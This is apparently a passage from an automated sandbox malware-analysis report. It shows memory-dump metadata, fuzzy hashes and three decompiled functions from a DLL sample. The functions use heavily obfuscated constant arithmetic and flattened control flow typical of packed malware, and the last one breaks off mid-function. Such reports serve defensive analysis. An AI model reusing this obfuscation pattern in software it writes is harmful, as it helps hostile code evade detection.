                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 1C4$F7$E
                                                                                                                                                                            • API String ID: 0-3303878784
                                                                                                                                                                            • Opcode ID: ec422184f0bc8e42d70ac5f52bb51cad38797440f210b574c256831cfc5cf489
                                                                                                                                                                            • Instruction ID: 653bf956eea0ed5356316e3fffdad338abdf337fe2290b477be2c8945a61a926
                                                                                                                                                                            • Opcode Fuzzy Hash: ec422184f0bc8e42d70ac5f52bb51cad38797440f210b574c256831cfc5cf489
                                                                                                                                                                            • Instruction Fuzzy Hash: 0C5177B2509341AFD358CF25D98992FBBE1FBC5788F405A1DF29656260D3B0CA09CF82
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E02F5B820(void* __ecx) {
                                                                                                                                                                            				intOrPtr _v4;
                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                            				void* _t158;
                                                                                                                                                                            				void* _t162;
                                                                                                                                                                            				signed int _t164;
                                                                                                                                                                            				signed int _t165;
                                                                                                                                                                            				signed int _t166;
                                                                                                                                                                            				signed int _t167;
                                                                                                                                                                            				signed int _t168;
                                                                                                                                                                            				signed int _t169;
                                                                                                                                                                            				intOrPtr _t192;
                                                                                                                                                                            				intOrPtr* _t193;
                                                                                                                                                                            				intOrPtr _t194;
                                                                                                                                                                            				signed int* _t196;
                                                                                                                                                                            
                                                                                                                                                                            				_t196 =  &_v68;
                                                                                                                                                                            				_v16 = 0xd87d65;
                                                                                                                                                                            				_v12 = 0x358b32;
                                                                                                                                                                            				_v8 = 0xe06945;
                                                                                                                                                                            				_t192 =  *0x2f76210; // 0x0
                                                                                                                                                                            				_v4 = 0;
                                                                                                                                                                            				_t162 = __ecx;
                                                                                                                                                                            				_v68 = 0xf23e36;
                                                                                                                                                                            				_t193 = _t192 + 0x210;
                                                                                                                                                                            				_v68 = _v68 ^ 0x9abe7b4c;
                                                                                                                                                                            				_t164 = 0x28;
                                                                                                                                                                            				_v68 = _v68 / _t164;
                                                                                                                                                                            				_v68 = _v68 + 0xffff9758;
                                                                                                                                                                            				_v68 = _v68 ^ 0x03db1914;
                                                                                                                                                                            				_v28 = 0x153966;
                                                                                                                                                                            				_v28 = _v28 + 0xc98d;
                                                                                                                                                                            				_v28 = _v28 ^ 0x00189a49;
                                                                                                                                                                            				_v32 = 0x66a403;
                                                                                                                                                                            				_v32 = _v32 + 0x4aa1;
                                                                                                                                                                            				_v32 = _v32 ^ 0x006148cf;
                                                                                                                                                                            				_v44 = 0xfe7e73;
                                                                                                                                                                            				_v44 = _v44 + 0xffff9639;
                                                                                                                                                                            				_v44 = _v44 | 0x437ec796;
                                                                                                                                                                            				_v44 = _v44 ^ 0x43f7a292;
                                                                                                                                                                            				_v48 = 0x44000d;
                                                                                                                                                                            				_t165 = 0x26;
                                                                                                                                                                            				_v48 = _v48 / _t165;
                                                                                                                                                                            				_v48 = _v48 | 0x123d3176;
                                                                                                                                                                            				_v48 = _v48 ^ 0x1230a07a;
                                                                                                                                                                            				_v60 = 0x1c671b;
                                                                                                                                                                            				_v60 = _v60 | 0x089dc1d7;
                                                                                                                                                                            				_t166 = 0x64;
                                                                                                                                                                            				_v60 = _v60 / _t166;
                                                                                                                                                                            				_t167 = 0x5e;
                                                                                                                                                                            				_v60 = _v60 * 0x62;
                                                                                                                                                                            				_v60 = _v60 ^ 0x087e3283;
                                                                                                                                                                            				_v24 = 0x917945;
                                                                                                                                                                            				_v24 = _v24 ^ 0x5fcd23bd;
                                                                                                                                                                            				_v24 = _v24 ^ 0x5f54fdfa;
                                                                                                                                                                            				_v64 = 0xfb1c79;
                                                                                                                                                                            				_v64 = _v64 ^ 0x3af08dd4;
                                                                                                                                                                            				_v64 = _v64 + 0x24a6;
                                                                                                                                                                            				_v64 = _v64 + 0xffffe057;
                                                                                                                                                                            				_v64 = _v64 ^ 0x3a029534;
                                                                                                                                                                            				_v36 = 0xae1548;
                                                                                                                                                                            				_v36 = _v36 * 0x1a;
                                                                                                                                                                            				_v36 = _v36 + 0x68c6;
                                                                                                                                                                            				_v36 = _v36 ^ 0x11a48673;
                                                                                                                                                                            				_v40 = 0xac750c;
                                                                                                                                                                            				_v40 = _v40 ^ 0x67c11f84;
                                                                                                                                                                            				_v40 = _v40 | 0x960dc624;
                                                                                                                                                                            				_v40 = _v40 ^ 0xf7630ea5;
                                                                                                                                                                            				_v52 = 0x5bbbfa;
                                                                                                                                                                            				_v52 = _v52 / _t167;
                                                                                                                                                                            				_v52 = _v52 + 0xc5b0;
                                                                                                                                                                            				_v52 = _v52 ^ 0x922587b4;
                                                                                                                                                                            				_v52 = _v52 ^ 0x922f6435;
                                                                                                                                                                            				_v56 = 0xb91e06;
                                                                                                                                                                            				_t168 = 0x13;
                                                                                                                                                                            				_v56 = _v56 / _t168;
                                                                                                                                                                            				_v56 = _v56 + 0x7f58;
                                                                                                                                                                            				_v56 = _v56 << 2;
                                                                                                                                                                            				_v56 = _v56 ^ 0x002d76eb;
                                                                                                                                                                            				_v20 = 0xce5e52;
                                                                                                                                                                            				_t169 = 0x56;
                                                                                                                                                                            				_v20 = _v20 / _t169;
                                                                                                                                                                            				_v20 = _v20 ^ 0x000b3737;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					_t194 =  *_t193;
                                                                                                                                                                            					if(_t194 == 0) {
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					if( *((intOrPtr*)(_t194 + 0x38)) == 0) {
                                                                                                                                                                            						L4:
                                                                                                                                                                            						 *_t193 =  *((intOrPtr*)(_t194 + 0x24));
                                                                                                                                                                            						_t158 = E02F72B09(_v52, _t194, _v56, _v20);
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t158 = E02F71028(_v28, _v32,  *((intOrPtr*)(_t194 + 0x48)), _t162, _v44, _v48);
                                                                                                                                                                            						_t196 =  &(_t196[4]);
                                                                                                                                                                            						if(_t158 != _v68) {
                                                                                                                                                                            							_t193 = _t194 + 0x24;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							 *((intOrPtr*)(_t194 + 0x2c))( *((intOrPtr*)(_t194 + 0x38)), 0, 0);
                                                                                                                                                                            							E02F5F0E9(_v72,  *((intOrPtr*)(_t194 + 0x38)), _v36, _v76);
                                                                                                                                                                            							E02F71538(_v48, _v52,  *((intOrPtr*)(_t194 + 0x48)));
                                                                                                                                                                            							_t196 =  &(_t196[3]);
                                                                                                                                                                            							goto L4;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t158;
                                                                                                                                                                            			}


































                                                                                                                                                                            0x02f5b820
                                                                                                                                                                            0x02f5b823
                                                                                                                                                                            0x02f5b82d
                                                                                                                                                                            0x02f5b835
                                                                                                                                                                            0x02f5b841
                                                                                                                                                                            0x02f5b849
                                                                                                                                                                            0x02f5b84d
                                                                                                                                                                            0x02f5b84f
                                                                                                                                                                            0x02f5b857
                                                                                                                                                                            0x02f5b85d
                                                                                                                                                                            0x02f5b86b
                                                                                                                                                                            0x02f5b870
                                                                                                                                                                            0x02f5b876
                                                                                                                                                                            0x02f5b87e
                                                                                                                                                                            0x02f5b886
                                                                                                                                                                            0x02f5b88e
                                                                                                                                                                            0x02f5b896
                                                                                                                                                                            0x02f5b89e
                                                                                                                                                                            0x02f5b8a6
                                                                                                                                                                            0x02f5b8ae
                                                                                                                                                                            0x02f5b8b6
                                                                                                                                                                            0x02f5b8be
                                                                                                                                                                            0x02f5b8c6
                                                                                                                                                                            0x02f5b8ce
                                                                                                                                                                            0x02f5b8d6
                                                                                                                                                                            0x02f5b8e2
                                                                                                                                                                            0x02f5b8e7
                                                                                                                                                                            0x02f5b8ed
                                                                                                                                                                            0x02f5b8f5
                                                                                                                                                                            0x02f5b8fd
                                                                                                                                                                            0x02f5b905
                                                                                                                                                                            0x02f5b911
                                                                                                                                                                            0x02f5b916
                                                                                                                                                                            0x02f5b921
                                                                                                                                                                            0x02f5b922
                                                                                                                                                                            0x02f5b926
                                                                                                                                                                            0x02f5b92e
                                                                                                                                                                            0x02f5b936
                                                                                                                                                                            0x02f5b93e
                                                                                                                                                                            0x02f5b946
                                                                                                                                                                            0x02f5b94e
                                                                                                                                                                            0x02f5b956
                                                                                                                                                                            0x02f5b95e
                                                                                                                                                                            0x02f5b966
                                                                                                                                                                            0x02f5b96e
                                                                                                                                                                            0x02f5b97b
                                                                                                                                                                            0x02f5b97f
                                                                                                                                                                            0x02f5b987
                                                                                                                                                                            0x02f5b98f
                                                                                                                                                                            0x02f5b997
                                                                                                                                                                            0x02f5b99f
                                                                                                                                                                            0x02f5b9a7
                                                                                                                                                                            0x02f5b9af
                                                                                                                                                                            0x02f5b9bd
                                                                                                                                                                            0x02f5b9c1
                                                                                                                                                                            0x02f5b9c9
                                                                                                                                                                            0x02f5b9d1
                                                                                                                                                                            0x02f5b9d9
                                                                                                                                                                            0x02f5b9e9
                                                                                                                                                                            0x02f5b9ee
                                                                                                                                                                            0x02f5b9f4
                                                                                                                                                                            0x02f5b9fc
                                                                                                                                                                            0x02f5ba01
                                                                                                                                                                            0x02f5ba09
                                                                                                                                                                            0x02f5ba15
                                                                                                                                                                            0x02f5ba18
                                                                                                                                                                            0x02f5ba1c
                                                                                                                                                                            0x02f5ba96
                                                                                                                                                                            0x02f5ba96
                                                                                                                                                                            0x02f5ba9a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5ba29
                                                                                                                                                                            0x02f5ba7c
                                                                                                                                                                            0x02f5ba8d
                                                                                                                                                                            0x02f5ba8f
                                                                                                                                                                            0x02f5ba2b
                                                                                                                                                                            0x02f5ba3f
                                                                                                                                                                            0x02f5ba44
                                                                                                                                                                            0x02f5ba4b
                                                                                                                                                                            0x02f5baa4
                                                                                                                                                                            0x02f5ba4d
                                                                                                                                                                            0x02f5ba52
                                                                                                                                                                            0x02f5ba64
                                                                                                                                                                            0x02f5ba74
                                                                                                                                                                            0x02f5ba79
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5ba79
                                                                                                                                                                            0x02f5ba4b
                                                                                                                                                                            0x02f5ba29
                                                                                                                                                                            0x02f5baa3

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $P$Ei$v-
                                                                                                                                                                            • API String ID: 0-1888193988
                                                                                                                                                                            • Opcode ID: 9f320720d68a52a6584504b69d66b1262fe7f1815e486bf460b0702b0b1eb6ff
                                                                                                                                                                            • Instruction ID: 86f33ba81197f0951a21a617a32e13c43b2752e2b0c8896190bf4f247e860aa5
                                                                                                                                                                            • Opcode Fuzzy Hash: 9f320720d68a52a6584504b69d66b1262fe7f1815e486bf460b0702b0b1eb6ff
                                                                                                                                                                            • Instruction Fuzzy Hash: 146145B15083809FD394CF25D48980BFBF2FBC8758F408A0DF59A56260D7B59A0ACF46
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                            			E02F707AA(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                            				char _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				void* _t127;
                                                                                                                                                                            				void* _t143;
                                                                                                                                                                            				void* _t147;
                                                                                                                                                                            				intOrPtr _t159;
                                                                                                                                                                            				void* _t165;
                                                                                                                                                                            				signed int _t166;
                                                                                                                                                                            				signed int _t167;
                                                                                                                                                                            				signed int _t168;
                                                                                                                                                                            				signed int _t169;
                                                                                                                                                                            				signed int* _t172;
                                                                                                                                                                            
                                                                                                                                                                            				_t145 = _a12;
                                                                                                                                                                            				_t164 = _a4;
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				E02F6FE29(_t127);
                                                                                                                                                                            				_v68 = 0xce0704;
                                                                                                                                                                            				_t172 =  &(( &_v80)[5]);
                                                                                                                                                                            				_t165 = 0;
                                                                                                                                                                            				_t147 = 0xeb10c15;
                                                                                                                                                                            				_push("true");
                                                                                                                                                                            				_pop(_t166);
                                                                                                                                                                            				_v68 = _v68 / _t166;
                                                                                                                                                                            				_v68 = _v68 ^ 0x27d6a24c;
                                                                                                                                                                            				_v68 = _v68 << 0xd;
                                                                                                                                                                            				_v68 = _v68 ^ 0x13812000;
                                                                                                                                                                            				_v56 = 0x3987d6;
                                                                                                                                                                            				_v56 = _v56 + 0xffffa396;
                                                                                                                                                                            				_v56 = _v56 << 6;
                                                                                                                                                                            				_v56 = _v56 + 0xffffda2f;
                                                                                                                                                                            				_v56 = _v56 ^ 0x0e4ab52f;
                                                                                                                                                                            				_v76 = 0xda5b69;
                                                                                                                                                                            				_v76 = _v76 + 0xffffc444;
                                                                                                                                                                            				_v76 = _v76 >> 3;
                                                                                                                                                                            				_v76 = _v76 | 0xf293bfd0;
                                                                                                                                                                            				_v76 = _v76 ^ 0xf29c223d;
                                                                                                                                                                            				_v80 = 0x3698bd;
                                                                                                                                                                            				_v80 = _v80 << 2;
                                                                                                                                                                            				_v80 = _v80 + 0xffffb830;
                                                                                                                                                                            				_v80 = _v80 | 0x7cee6fd8;
                                                                                                                                                                            				_v80 = _v80 ^ 0x7cfe3832;
                                                                                                                                                                            				_v44 = 0x3a6f25;
                                                                                                                                                                            				_v44 = _v44 >> 3;
                                                                                                                                                                            				_v44 = _v44 ^ 0x000731a8;
                                                                                                                                                                            				_v48 = 0xdbe73e;
                                                                                                                                                                            				_v48 = _v48 | 0x7450ea9d;
                                                                                                                                                                            				_v48 = _v48 ^ 0x74de2fdf;
                                                                                                                                                                            				_v36 = 0x16da79;
                                                                                                                                                                            				_t167 = 0x12;
                                                                                                                                                                            				_v36 = _v36 * 0x5d;
                                                                                                                                                                            				_v36 = _v36 ^ 0x084db146;
                                                                                                                                                                            				_v60 = 0xec6235;
                                                                                                                                                                            				_v60 = _v60 + 0x184b;
                                                                                                                                                                            				_v60 = _v60 / _t167;
                                                                                                                                                                            				_v60 = _v60 | 0x0c30d5fb;
                                                                                                                                                                            				_v60 = _v60 ^ 0x0c38efee;
                                                                                                                                                                            				_v64 = 0x38c801;
                                                                                                                                                                            				_v64 = _v64 >> 9;
                                                                                                                                                                            				_v64 = _v64 ^ 0xc825be84;
                                                                                                                                                                            				_v64 = _v64 >> 0x10;
                                                                                                                                                                            				_v64 = _v64 ^ 0x000d1c3b;
                                                                                                                                                                            				_v72 = 0xe77e6e;
                                                                                                                                                                            				_v72 = _v72 + 0xffffb3b2;
                                                                                                                                                                            				_v72 = _v72 << 0xd;
                                                                                                                                                                            				_t168 = 0x78;
                                                                                                                                                                            				_v72 = _v72 / _t168;
                                                                                                                                                                            				_v72 = _v72 ^ 0x01e31a81;
                                                                                                                                                                            				_v40 = 0x7e766a;
                                                                                                                                                                            				_v40 = _v40 * 0x26;
                                                                                                                                                                            				_v40 = _v40 ^ 0x12c7afcd;
                                                                                                                                                                            				_v52 = 0xe103b8;
                                                                                                                                                                            				_t169 = 0x4e;
                                                                                                                                                                            				_v52 = _v52 / _t169;
                                                                                                                                                                            				_v52 = _v52 + 0xffff4b52;
                                                                                                                                                                            				_v52 = _v52 ^ 0x000d8548;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t147 != 0x8d72c38) {
                                                                                                                                                                            						if(_t147 == 0xc75b0cb) {
                                                                                                                                                                            							_t143 = E02F557B8( *_t164, _v76, _v80,  *((intOrPtr*)(_t164 + 4)), _v44,  &_v32, _v48);
                                                                                                                                                                            							_t172 =  &(_t172[6]);
                                                                                                                                                                            							if(_t143 != 0) {
                                                                                                                                                                            								_t147 = 0x8d72c38;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t147 != 0xeb10c15) {
                                                                                                                                                                            								goto L8;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t147 = 0xc75b0cb;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L9;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t159 =  *0x2f76224; // 0x0
                                                                                                                                                                            					E02F74D53( *((intOrPtr*)(_t145 + 4)),  *((intOrPtr*)(_t159 + 0x48)), _v36, _t147,  &_v32, _v60, _v64, _v68, _v72, _v40, _t147,  *_t145, _v52);
                                                                                                                                                                            					_t172 =  &(_t172[0xb]);
                                                                                                                                                                            					_t147 = 0x3b36d39;
                                                                                                                                                                            					_t165 =  ==  ? 1 : _t165;
                                                                                                                                                                            					L8:
                                                                                                                                                                            				} while (_t147 != 0x3b36d39);
                                                                                                                                                                            				L9:
                                                                                                                                                                            				return _t165;
                                                                                                                                                                            			}


























                                                                                                                                                                            0x02f707ae
                                                                                                                                                                            0x02f707b5
                                                                                                                                                                            0x02f707b9
                                                                                                                                                                            0x02f707ba
                                                                                                                                                                            0x02f707be
                                                                                                                                                                            0x02f707bf
                                                                                                                                                                            0x02f707c1
                                                                                                                                                                            0x02f707c6
                                                                                                                                                                            0x02f707ce
                                                                                                                                                                            0x02f707d7
                                                                                                                                                                            0x02f707d9
                                                                                                                                                                            0x02f707de
                                                                                                                                                                            0x02f707e0
                                                                                                                                                                            0x02f707e5
                                                                                                                                                                            0x02f707eb
                                                                                                                                                                            0x02f707f3
                                                                                                                                                                            0x02f707f8
                                                                                                                                                                            0x02f70800
                                                                                                                                                                            0x02f70808
                                                                                                                                                                            0x02f70810
                                                                                                                                                                            0x02f70815
                                                                                                                                                                            0x02f7081d
                                                                                                                                                                            0x02f70825
                                                                                                                                                                            0x02f7082d
                                                                                                                                                                            0x02f70835
                                                                                                                                                                            0x02f7083a
                                                                                                                                                                            0x02f70842
                                                                                                                                                                            0x02f7084a
                                                                                                                                                                            0x02f70852
                                                                                                                                                                            0x02f70857
                                                                                                                                                                            0x02f7085f
                                                                                                                                                                            0x02f70867
                                                                                                                                                                            0x02f7086f
                                                                                                                                                                            0x02f70877
                                                                                                                                                                            0x02f7087c
                                                                                                                                                                            0x02f70884
                                                                                                                                                                            0x02f7088c
                                                                                                                                                                            0x02f70894
                                                                                                                                                                            0x02f7089c
                                                                                                                                                                            0x02f708a9
                                                                                                                                                                            0x02f708ac
                                                                                                                                                                            0x02f708b0
                                                                                                                                                                            0x02f708b8
                                                                                                                                                                            0x02f708c0
                                                                                                                                                                            0x02f708d0
                                                                                                                                                                            0x02f708d4
                                                                                                                                                                            0x02f708dc
                                                                                                                                                                            0x02f708e4
                                                                                                                                                                            0x02f708ec
                                                                                                                                                                            0x02f708f1
                                                                                                                                                                            0x02f708f9
                                                                                                                                                                            0x02f708fe
                                                                                                                                                                            0x02f70906
                                                                                                                                                                            0x02f7090e
                                                                                                                                                                            0x02f70916
                                                                                                                                                                            0x02f7091f
                                                                                                                                                                            0x02f70922
                                                                                                                                                                            0x02f70926
                                                                                                                                                                            0x02f7092e
                                                                                                                                                                            0x02f7093b
                                                                                                                                                                            0x02f7093f
                                                                                                                                                                            0x02f70947
                                                                                                                                                                            0x02f70957
                                                                                                                                                                            0x02f7095f
                                                                                                                                                                            0x02f70963
                                                                                                                                                                            0x02f7096b
                                                                                                                                                                            0x02f70973
                                                                                                                                                                            0x02f70973
                                                                                                                                                                            0x02f7097d
                                                                                                                                                                            0x02f709a8
                                                                                                                                                                            0x02f709ad
                                                                                                                                                                            0x02f709b2
                                                                                                                                                                            0x02f709b4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f709b4
                                                                                                                                                                            0x02f7097f
                                                                                                                                                                            0x02f70985
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f70987
                                                                                                                                                                            0x02f70987
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f70987
                                                                                                                                                                            0x02f70985
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f7097d
                                                                                                                                                                            0x02f709dd
                                                                                                                                                                            0x02f709e9
                                                                                                                                                                            0x02f709f7
                                                                                                                                                                            0x02f709fc
                                                                                                                                                                            0x02f70a01
                                                                                                                                                                            0x02f70a04
                                                                                                                                                                            0x02f70a04
                                                                                                                                                                            0x02f70a11
                                                                                                                                                                            0x02f70a19

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 5b$jv~$n~
                                                                                                                                                                            • API String ID: 0-1119068381
                                                                                                                                                                            • Opcode ID: b7a6d9dc80006abf94b568b78e351aab211d0cb732d223061ae29d60f322f7e5
                                                                                                                                                                            • Instruction ID: 1dcc6db36d1014263c6fa59ce34635d73116579f146e371b0e4cbe383dbd1ac9
                                                                                                                                                                            • Opcode Fuzzy Hash: b7a6d9dc80006abf94b568b78e351aab211d0cb732d223061ae29d60f322f7e5
                                                                                                                                                                            • Instruction Fuzzy Hash: A15133725083059FC748CF25C98981FBBE1FBD8798F509A1DF296A6220D771CA89CF46
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                            			E02F67A0F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                            				char _v596;
                                                                                                                                                                            				void* _t147;
                                                                                                                                                                            				signed int _t170;
                                                                                                                                                                            				signed int _t171;
                                                                                                                                                                            				signed int _t172;
                                                                                                                                                                            				signed int _t173;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t147);
                                                                                                                                                                            				_v72 = _v72 & 0x00000000;
                                                                                                                                                                            				_v68 = _v68 & 0x00000000;
                                                                                                                                                                            				_v76 = 0xac6bc1;
                                                                                                                                                                            				_v48 = 0x918367;
                                                                                                                                                                            				_v48 = _v48 >> 6;
                                                                                                                                                                            				_v48 = _v48 ^ 0x000cf094;
                                                                                                                                                                            				_v36 = 0xe92c2d;
                                                                                                                                                                            				_v36 = _v36 ^ 0xfac2eab7;
                                                                                                                                                                            				_v36 = _v36 << 0xf;
                                                                                                                                                                            				_v36 = _v36 ^ 0xe346c7b1;
                                                                                                                                                                            				_v64 = 0xc08572;
                                                                                                                                                                            				_t170 = 0x1e;
                                                                                                                                                                            				_v64 = _v64 / _t170;
                                                                                                                                                                            				_v64 = _v64 ^ 0x00015c03;
                                                                                                                                                                            				_v12 = 0x9212d2;
                                                                                                                                                                            				_t171 = 0x1d;
                                                                                                                                                                            				_v12 = _v12 * 0x39;
                                                                                                                                                                            				_v12 = _v12 + 0x3383;
                                                                                                                                                                            				_v12 = _v12 >> 2;
                                                                                                                                                                            				_v12 = _v12 ^ 0x08263998;
                                                                                                                                                                            				_v32 = 0xc20336;
                                                                                                                                                                            				_v32 = _v32 * 0x70;
                                                                                                                                                                            				_v32 = _v32 ^ 0x74671eb1;
                                                                                                                                                                            				_v32 = _v32 ^ 0x2084f54c;
                                                                                                                                                                            				_v40 = 0xa9787c;
                                                                                                                                                                            				_v40 = _v40 ^ 0x381c5a49;
                                                                                                                                                                            				_v40 = _v40 | 0x64fc5a0b;
                                                                                                                                                                            				_v40 = _v40 ^ 0x7cf9cebd;
                                                                                                                                                                            				_v20 = 0x646c84;
                                                                                                                                                                            				_v20 = _v20 * 0xa;
                                                                                                                                                                            				_v20 = _v20 ^ 0x10bf9a9f;
                                                                                                                                                                            				_v20 = _v20 ^ 0x793d42f9;
                                                                                                                                                                            				_v20 = _v20 ^ 0x6a6515eb;
                                                                                                                                                                            				_v60 = 0xc09cf0;
                                                                                                                                                                            				_v60 = _v60 << 9;
                                                                                                                                                                            				_v60 = _v60 ^ 0x813cbcc6;
                                                                                                                                                                            				_v8 = 0xc99b6c;
                                                                                                                                                                            				_v8 = _v8 * 0x26;
                                                                                                                                                                            				_v8 = _v8 + 0xffff7686;
                                                                                                                                                                            				_v8 = _v8 ^ 0x08dcc16a;
                                                                                                                                                                            				_v8 = _v8 ^ 0x1531615b;
                                                                                                                                                                            				_v44 = 0x17c218;
                                                                                                                                                                            				_v44 = _v44 | 0xd7791395;
                                                                                                                                                                            				_v44 = _v44 + 0xde66;
                                                                                                                                                                            				_v44 = _v44 ^ 0xd7809290;
                                                                                                                                                                            				_v28 = 0x8f3b5f;
                                                                                                                                                                            				_v28 = _v28 >> 0xb;
                                                                                                                                                                            				_v28 = _v28 * 0x5e;
                                                                                                                                                                            				_v28 = _v28 ^ 0x00039abd;
                                                                                                                                                                            				_v56 = 0xe3e33c;
                                                                                                                                                                            				_v56 = _v56 * 0x69;
                                                                                                                                                                            				_v56 = _v56 ^ 0x5d7c15ff;
                                                                                                                                                                            				_v52 = 0x7e8124;
                                                                                                                                                                            				_v52 = _v52 + 0xc0d9;
                                                                                                                                                                            				_v52 = _v52 ^ 0x007e7944;
                                                                                                                                                                            				_v24 = 0x2edb0b;
                                                                                                                                                                            				_v24 = _v24 / _t171;
                                                                                                                                                                            				_t172 = 0x3a;
                                                                                                                                                                            				_v24 = _v24 / _t172;
                                                                                                                                                                            				_t173 = 0x6f;
                                                                                                                                                                            				_v24 = _v24 / _t173;
                                                                                                                                                                            				_v24 = _v24 ^ 0x00044e1b;
                                                                                                                                                                            				_v16 = 0xd6e45b;
                                                                                                                                                                            				_v16 = _v16 * 0x6a;
                                                                                                                                                                            				_v16 = _v16 | 0xc518fde9;
                                                                                                                                                                            				_v16 = _v16 + 0xffff1d23;
                                                                                                                                                                            				_v16 = _v16 ^ 0xddf5a256;
                                                                                                                                                                            				_push(_v12);
                                                                                                                                                                            				_push(_v64);
                                                                                                                                                                            				_push(_v36);
                                                                                                                                                                            				E02F62C9C(_v40, _v16, E02F6E1F8(0x2f5170c, _v48, _v16),  &_v596, 0x2f5170c, _v20, __edx);
                                                                                                                                                                            				E02F6FECB(_t164, _v60, _v8, _v44, _v28);
                                                                                                                                                                            				return E02F5D061( &_v596, _v56, _v52, _v24, _v16);
